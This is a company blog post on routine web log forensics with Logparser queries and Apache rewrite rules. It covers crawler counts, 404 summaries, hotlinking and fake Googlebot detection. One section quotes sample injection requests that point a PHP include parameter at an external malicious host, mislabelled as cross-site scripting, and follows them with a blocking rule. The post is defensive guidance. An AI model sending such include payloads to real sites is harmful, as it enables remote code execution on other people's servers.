- Home
- Blogs
- George Boobyer's blog
- Safe guard your web site with routine web log analysis and forensics
Safe guard your web site with routine web log analysis and forensics
Whether you are running Drupal,Wordpress, Expression engine, Joomla or in fact any web site one of the regular tasks you should carryout on your web site is a bit of log analysis. It is often left up to modules, plug ins or someone else to protect your web site until it too late.
We all rely on Google Analytics to tell us about visitors and maybe use our log analysis software (AWStats, Webaliser etc) to report on log entries - but it is always worth using tools locally to dig deeper into your logs. These can range from simple reports on accesses to your site to more detailed forensic analysis of site activity.
By doing this we get to know better how visitors are accessing our site and can uncover some interesting answers to questions such as:
- How often is Google actually spidering my site?
- How many errors am I getting and what are they?
- Who is stealing my content?
- Is anyone trying to crack my site?
In this post I will briefly cover some useful techniques to analyse you logs and see if any one is abusing your hospitality.
We host our CMS sites on Linux based servers and develop locally on a mixture of WAMP and LAMP. This post covers WAMP tools. You might find equally useful tools for LAMP and MAMP. I also use Logparser to do forensic analysis on IIS logs, eventlogs and other log formats.
If you are using it for Apache logs you will need to select the NCSA Log File format.
For this we are going to look at logparser and Log Lizard which allow us to use SQL-like queries to process our logs.
First off - where do get these tools?
- Logparser
- Microsoft - Logparser
- Logparser Lizard
- Lizard Labs - http://www.lizard-labs.net/PageHtml.aspx?lng=2&PageId=18&PageListItemId=17
I don't aim to cover the full installation and use of these here - they both have ample online help.
In short, follow the installation instructions and get the Log Lizard set up.
One thing I find very useful is to use the Options to set up key/values for my log folders so they can be referenced in the queries as #WebLogs# rather than typing out the file ref every time. Also once you have some useful queries save them to a query group so you can use them again and again.
How often is google actually spidering my site
You can query your logs for entries with the User Agent of
so something like the following will give you a count of google hits per day:
SELECT TO_Date(datetime) as Day, count(*) as count
FROM #WebLogs#mysite.com
where user-agent = 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
group by Day
Usefully you could also check the logs to look at the progression of requests by Google to see if the entries make sense and don't contain any 404 File not found pages.
How many errors am I getting and what are they
One of the queries I run on a regular basis is a count of all error pages to ensure I am not getting any ; )
SELECT statuscode AS Status, COUNT(*) AS Total
FROM #WebLogs#mysite.com
GROUP BY Status
ORDER BY Total DESC
If you find you have a lot of 404 errors for example it is worth summarising these and putting in rewrite rules to redirect any visits to a better page. You might find that some are fishing for vulnerable pages for example and if you get a regular culprit you can block them outside of Drupal so you don't waste resources on them again.
Checking on missing pages and images - 404 errors
The following query will count the number of hits on missing pages. Note it also ignores certain IP addresses - put yours in here so that you can ignore your own hits.
SELECT distinct Request, count(*) as countofhits
FROM #WebLogs#mysite.com
where statuscode = 404 and remotehostname not in ('123.123.123.123';'123.123.123.124')
group by Request
order by countofhits desc
Once you find a page that is being requested but is missing from your site you can add a redirect to your httpd.conf or .htaccess file.
We recently upgraded an old site for a customer from static html and asp to Drupal, so we wanted to redirect all of the old htm and asp pages to the new home page - but in this case we wanted to have a closed.htm page so that we could put the site in to maintenance mode outside of Drupal.
#catch all for old asp pages
RewriteCond %{REQUEST_URI} !^closed.htm
RewriteRule ^(.*).(asp|html|htm)$ / [L,R=301]
So in the above example it says permanently redirect all requests to asp, htm and html pages to the site root unless they ask for closed.htm
You can simply delete the RewrireCond line (I simply put it here to show you that you can redirect all htm files but for one or two specific ones you may still need).
Who is stealing my content or trying to hack my site
It is always worth seeing if someone is linking to content on your site without having browsed to your site (images etc)
IN this case you will see requests for images that have no referrer set. This is not an exact science so you don't want to block these per se but it is wirth having a look to understand the 'uses' of your site.
SELECT *
FROM #WebLogs#mysite.com
where referer is null and IPV4_TO_INT(RemoteHostName) not BETWEEN IPV4_TO_INT('66.249.65.0') AND IPV4_TO_INT('66.249.68.255')
and remotehostname not in ('123.123.123.123';'123.123.123.124')
and ((index_of(request,'.png') > -1) or (index_of(request,'.gif') > -1) or (index_of(request,'.jpg') > -1))
order by datetime desc
This will show all requests for images (png,gif and jpg - add to the list as you wish) that haven't come from a request for a page first.
This is not nromally too critical but often throws up some interesting visits that may be malicious or unwanted.
Recently I ran a quick check and found that someone was impersonating the Googlebot when accessing my site.
I normally run a simple report to count visits by the Googlebots and check that they are getting the access they need to index my sites.
something like
SELECT TO_Date(datetime) as Day, count(*) as count
FROM #WebLogs#mysite.com
where user-agent = 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
group by Day
However that assumes that everyone declaring themselves to be Google (in the useragent string) is actually Google.
If you run the following query:
SELECT *
FROM #WebLogs#mysite.com
WHERE INDEX_OF(user-agent,'Googlebot') > -1
If you do that you get a list of all of the visits by user agents stating they are Googlebot.
If you eye ball the list of IP address you can see most will be in the range of 66.249.65.0 to 66.249.68.255
You can check what IP addresses google uses but this is good enough.
So now run a report on what visits you have had from user agents saying they are Googlebot but that come from a different subnet.
SELECT *
FROM #WebLogs#mysite.com
WHERE IPV4_TO_INT(RemoteHostName) not BETWEEN IPV4_TO_INT('66.249.65.0') AND IPV4_TO_INT('66.249.68.255')
and INDEX_OF(user-agent,'Googlebot') > -1
and bob's your uncle you get a few imposters
You can then check what they are doing and if you think they are worth banning then put in a line on your httpd.cnf or .htaccess to ban them.
Cross Site Scripting attacks - XSS
Be on the look out for Cross site scripting attack attempts to
GET /DB_active_rec.php?BASEPATH=http:// HTTP/1.1
and
GET /apage.php//?_PHPLIB[libdir]=http://www.somescuzzysite.mal/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1
This is where a malicious visitor is trying to get your site to run code referenced on an external site.
These can be countered by the following in your httpd.conf or .htaccess files.
#xss exploit of Codeignitor PHP injection attempts
#RewriteCond %{QUERY_STRING} ^BASEPATH=(.*)$
#RewriteRule ^db_active_rec\.php$ - [F,L,NC]
# this can be replaced with a more generic one
RewriteCond %{QUERY_STRING} ^((.*)=http|_PHPLIB[libdir]=)(.*)$ [NC]
RewriteRule ^.* - [F,L]
Blocking unwanted visitors
If after a bit of analysis you find a regular offender (once is regular enough!).
You can locate their IP addresses and ban them specifically by adding the following to your httpd.conf or .htaccess files.
# some security (note these are not real ip addresses!)
RewriteCond %{REMOTE_ADDR} ^(123\.456\.789\.123|123\.456\.789\.124)$
RewriteRule ^(.*)$ - [F,L]
Conclusion
As you can see, with a bit of work it is easy to interrogate your logs locally and really dig into your site activity.
This is an essential security task and one that will regularly throw up some interesting issues. I will update this post with any more routine scripts if i think of any.
Contact Details
Blue-Bag Ltd
- info [at] blue-bag.com
- Telephone: 0843 2894522
- Blue-Bag HQ:
The Garage, Manor Farm
Chilcompton, Radstock
Somerset, BA3 4HP, United Kingdom - Telephone: (+44) 01761 411542
- Blue-Bag Brighton:
Unit 35 Level 6 North, New England House
New England Street, Brighton
BN1 4GH United Kingdom - Telephone: (+44) 07944 938204
- VAT GB 748125034
- UK Company Reg: 3932829